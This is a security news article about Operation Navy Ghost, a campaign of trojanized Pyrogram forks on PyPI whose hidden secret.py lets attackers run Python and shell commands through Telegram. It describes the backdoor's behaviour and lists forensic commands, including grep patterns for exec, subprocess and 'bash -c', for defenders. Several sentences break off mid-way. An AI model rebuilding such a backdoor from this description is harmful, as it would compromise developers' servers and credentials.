Listen to this Post
Introduction: A Trusted Python Library Becomes the Perfect Cyber Trap
Open source software has become the backbone of modern application development, allowing developers to build powerful services in minutes rather than months. However, the same trust that fuels the open source ecosystem can also become its greatest weakness. Cybercriminals increasingly exploit popular libraries by publishing malicious forks that appear legitimate but secretly contain dangerous backdoors.
A newly uncovered cyber-espionage campaign known as Operation Navy Ghost demonstrates exactly how devastating these attacks can be. Instead of targeting end users, the attackers went after Python developers maintaining Telegram bots, embedding hidden malware inside multiple fake versions of the well-known Pyrogram framework. Once installed, these seemingly harmless packages quietly granted remote access to production servers, exposing sensitive databases, API credentials, cloud infrastructure, and private Telegram conversations without the victims realizing it.
Operation Navy Ghost Targets Telegram Bot Developers
Security researchers from Checkmarx have uncovered an extensive software supply chain attack that has been active since November 2025, specifically targeting Python developers who build Telegram bots using the Pyrogram framework.
Rather than exploiting vulnerabilities in Telegram itself, the attackers created multiple malicious forks of the legitimate Pyrogram library and uploaded them to the Python Package Index (PyPI). These packages appeared to be normal alternatives or customized versions of the original framework, making them difficult to distinguish from legitimate projects.
Developers installing these fake packages unknowingly introduced a fully functional remote access backdoor into their production environments.
Pyrogram’s Popularity Made It an Attractive Target
Although the original Pyrogram project has not received active maintenance since 2023, it remains widely used across the Python ecosystem.
With approximately 350,000 monthly downloads and more than 1,400 GitHub forks, Pyrogram continues to power thousands of Telegram automation projects, administrative bots, monitoring systems, customer support services, and personal userbots.
This widespread adoption created an ideal attack surface. Instead of compromising Pyrogram itself, attackers simply published convincing forks under different names, expecting developers to install them during dependency searches.
Eight Malicious Packages Were Uploaded to PyPI
Researchers identified eight separate malicious packages distributed across PyPI between November 2025 and June 2026.
The known malicious packages include:
VLifeGram
VLife-Gram
pyrogram-navy
pyrogram-styled
pyrogram-zeeb
kelragram
sepgram
pyrogram-kelra
Collectively, these packages accumulated tens of thousands of downloads before being identified.
Among them, pyrogram-styled proved especially successful, recording more than 15,000 downloads, dramatically increasing the campaign’s potential victim count.
The Hidden Backdoor Inside Every Package
Each malicious package contained nearly identical copies of the legitimate Pyrogram source code, making manual inspection appear normal.
Hidden inside the helper modules, however, researchers discovered an additional file named secret.py.
This file silently activated every time a Telegram bot started or imported the library, registering invisible Telegram command handlers that only specific attacker-controlled accounts could access.
Unlike traditional malware that attempts to infect users immediately, this backdoor patiently waited for commands sent directly through Telegram itself.
Attackers Could Execute Python Code Remotely
One of the
By sending specially crafted Telegram commands, attackers could instantly interact with the running application and access its execution environment.
That meant they could inspect environment variables, steal authentication secrets, examine API keys, manipulate application memory, and even interact directly with active Telegram sessions.
Since the malicious commands executed inside the
Remote Shell Access Opened the Entire Server
Beyond executing Python code, the malware also provided complete shell access.
Attackers could issue Linux commands through Telegram, allowing them to browse directories, steal configuration files, inspect databases, read sensitive documents, or deploy additional malware.
Researchers demonstrated that commands equivalent to reading sensitive operating system files could be executed remotely, proving that virtually any accessible file could be exfiltrated from compromised servers.
Large outputs exceeding
Production Servers Were the Primary Objective
The malware intentionally ignored ordinary Telegram user accounts.
Instead, it activated only when detecting Telegram bot accounts typically deployed on production infrastructure.
This selective behavior significantly reduced detection while maximizing the value of each compromised system.
Production Telegram bots often possess privileged access to:
Cloud platforms
Internal APIs
Customer databases
Authentication tokens
Payment systems
Environment variables
Encryption secrets
By focusing exclusively on production bots, attackers dramatically increased the likelihood of accessing high-value infrastructure.
Built-In Protection for the Attackers
Researchers also discovered a hardcoded list named OWNERS embedded inside the malware.
This list contained authorized Telegram account identifiers that granted exclusive administrative access to the hidden command interface.
Interestingly, the malware automatically disabled itself whenever it detected one of these owner accounts, preventing accidental self-infection by the operators.
This small detail strongly suggests a carefully engineered and professionally managed campaign rather than an opportunistic attack.
Evidence Points to a Single Threat Actor
Although the malicious packages appeared under multiple PyPI publisher accounts, Checkmarx concluded they were operated by a single threat actor.
Several technical indicators supported this assessment, including:
Identical backdoor implementations
Shared Telegram owner identifiers
Matching command structures
Similar infrastructure
Consistent coding techniques
Reused operational patterns
These shared characteristics reveal a coordinated supply chain campaign rather than isolated malicious uploads.
Immediate Actions for Potential Victims
Organizations that installed any of the affected packages should assume their infrastructure has been compromised.
Immediate response actions include:
Remove all malicious packages.
Audit every installed Python dependency.
Rotate all passwords and API credentials.
Revoke Telegram bot tokens.
Replace exposed cloud credentials.
Review server logs for unusual Telegram activity.
Scan systems for additional persistence mechanisms.
Rebuild affected environments if compromise is confirmed.
Because the malware could execute arbitrary commands, simply uninstalling the package does not guarantee that attackers no longer have access.
Deep Analysis: Detecting and Investigating Trojanized Python Packages
Modern supply chain attacks rarely rely on software vulnerabilities. Instead, they abuse developer trust. Detecting these threats requires examining dependencies, package integrity, runtime behavior, and filesystem modifications across development and production systems.
Useful Linux investigation commands include:
pip list pip freeze pip show pyrogram pip show pyrogram-styled pip show VLifeGram
pip uninstall pyrogram-styled pip uninstall pyrogram-navy
find . -name "secret.py"
grep -R OWNERS .
grep -R /asu .
grep -R /asi .
grep -R CommandHandler .
grep -R exec( .
grep -R subprocess .
grep -R os.system .
grep -R bash -c .
grep -R telegram .
find / -name ".py" 2>/dev/null
history
env
printenv
ps aux
ss -tulpn
netstat -antp
lsof -i
journalctl -xe
systemctl list-units
crontab -l
ls -la ~/.config
ls -la ~/.local
cat requirements.txt
pip check
pipdeptree
sha256sum secret.py
python3 -m venv cleanenv
pip install --upgrade pip
pip audit
pip cache purge
git diff
git status
git log
docker ps
docker inspect <container>
kubectl get pods
kubectl logs <pod-name>
sudo ausearch -m EXECVE
Routine dependency verification, software bill of materials (SBOM) generation, package signature validation, and continuous runtime monitoring should become standard practices for every organization relying on open source software. Supply chain attacks increasingly bypass traditional antivirus solutions because the malicious code arrives disguised as trusted software updates rather than conventional malware.
What Undercode Say:
Operation Navy Ghost highlights one of the fastest-growing threats in cybersecurity: software supply chain compromise. Rather than attacking operating systems or exploiting zero-day vulnerabilities, adversaries now target developer trust, knowing that a single poisoned dependency can infiltrate thousands of production environments.
The campaign demonstrates careful operational planning. The attackers selected a mature but no longer actively maintained project with a large user base, reducing the likelihood of rapid security updates while maximizing potential victims.
Publishing several differently named forks significantly increased visibility within package searches. Developers looking for enhanced or customized versions could unknowingly install malicious packages without raising suspicion.
The backdoor itself is technically elegant. Instead of creating noisy outbound network traffic, it leverages Telegram as its command-and-control channel, blending malicious communications with legitimate application traffic.
Restricting activation to Telegram bot accounts shows a clear understanding of enterprise infrastructure. Production bots frequently possess elevated permissions, making them ideal targets for credential theft and infrastructure reconnaissance.
The malware also minimizes operational risk for its creators by suppressing errors and disabling unnecessary logging, reducing opportunities for defenders to notice suspicious behavior.
Using Telegram messages to return stolen information eliminates the need for custom command servers, lowering operational costs while increasing resilience.
Embedding owner identifiers directly into the malware further demonstrates disciplined campaign management and prevents accidental exposure during attacker testing.
This attack reinforces that dependency management is no longer merely a software engineering concern. It has become a critical cybersecurity responsibility.
Organizations should maintain internal mirrors of trusted packages whenever possible instead of downloading dependencies directly from public repositories during production deployments.
Dependency pinning should be mandatory to reduce the risk of unintentionally installing newly uploaded malicious versions.
Continuous Software Composition Analysis (SCA) should monitor every dependency update before deployment.
Automated integrity verification using cryptographic hashes provides another valuable defensive layer.
Developers should review package maintainers before adopting unfamiliar forks.
Even minor package name variations deserve careful scrutiny.
Runtime behavior monitoring remains equally important because malicious packages may appear legitimate during installation.
Least-privilege principles should limit what Telegram bots can access within production environments.
Environment variables containing secrets should be minimized wherever practical.
Credential rotation plans should exist before incidents occur rather than afterward.
Organizations should assume that any compromised production bot may expose cloud credentials.
Infrastructure-as-Code repositories should also be reviewed after such incidents.
Incident response teams should investigate persistence beyond the initial malicious package.
Containerized workloads require image rebuilding rather than simple package removal.
Comprehensive logging dramatically improves forensic investigations.
Security awareness training should include software supply chain risks alongside phishing education.
Code reviews should examine dependency additions with the same rigor as application logic.
SBOM adoption is becoming increasingly essential for rapid incident response.
Package reputation scoring may become a standard enterprise security control.
Artificial intelligence will likely improve detection of suspicious package behaviors before installation.
Unfortunately, attackers will also leverage AI to generate increasingly convincing malicious libraries.
The software ecosystem continues expanding faster than manual review can manage.
Automated trust verification will therefore become indispensable.
Developer productivity must always be balanced against security validation.
Trust should never replace verification, especially within open source ecosystems.
Operation Navy Ghost serves as another reminder that modern cyberattacks often begin with a single seemingly harmless installation command.
✅ Fact: Multiple malicious PyPI packages impersonating Pyrogram forks were identified by Checkmarx during the Operation Navy Ghost investigation.
✅ Fact: The malware allowed remote execution of both Python code and shell commands through hidden Telegram command handlers, enabling attackers to access sensitive files, credentials, and production environments.
✅ Fact: Security experts recommend removing the malicious packages immediately, rotating every exposed credential, revoking Telegram bot tokens, and thoroughly investigating systems for persistence because uninstalling the package alone may not eliminate attacker access.
Prediction
(+1) Software repositories will continue introducing stronger package verification, publisher validation, cryptographic signing, and AI-powered malware detection to reduce the success of dependency poisoning attacks.
(-1) Threat actors will increasingly target developers instead of end users, creating more sophisticated malicious forks of popular open source projects that remain difficult to distinguish from legitimate software until after production deployment.
▶️ Related Video (82% Match):
🕵️📝Let’s dive deep and fact‑check.
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
References:
Reported By: www.bleepingcomputer.com
Extra Source Hub (Possible Sources for article):
https://www.digitaltrends.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon | 📺Youtube
